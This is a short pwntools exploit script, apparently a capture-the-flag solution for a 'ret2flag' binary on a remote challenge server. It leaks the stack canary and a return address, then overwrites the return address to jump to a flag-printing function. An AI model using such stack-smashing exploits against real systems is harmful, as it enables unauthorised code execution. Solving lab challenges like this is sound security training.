#!/usr/bin/env python3
from pwn import *

# context.binary = './ret2flag'
# context.terminal = ['gnome-terminal', '--']

# p = gdb.debug('./ret2flag', gdbscript='''
#     b 27
#     c
# ''')


HOST = '140.113.207.245'
PORT = 30174
p = remote(HOST, PORT)

# 拿canary
payload = b'A' * 25
p.send(payload)
sleep(0.1)
recv_data = p.recvuntil(payload)
canary = b"\x00" + p.recv(7)

#拿原本的return addr (base +拿原本的return addr (base + 1476))
payload = b'A' * 40
p.send(payload)
# sleep(0.1)
recv_data = p.recvuntil(payload)
old_return_addr = p.recv(6) + b"\x00\x00"

#把return addr 換成 putflag (offset = 1269)
new_return_addr = u64(old_return_addr) - 0x1476 + 0x1269
new_return_addr = p64(new_return_addr)

payload = b'A' * 24 + canary + b'A' * 8 + new_return_addr
print(payload)
p.send(payload)
p.recvline()
# sleep(1)
p.send(b'B' * 16)
p.recvline()
# sleep(1)
p.send(b'B' * 16)
p.recvline()
# sleep(1)
p.interactive()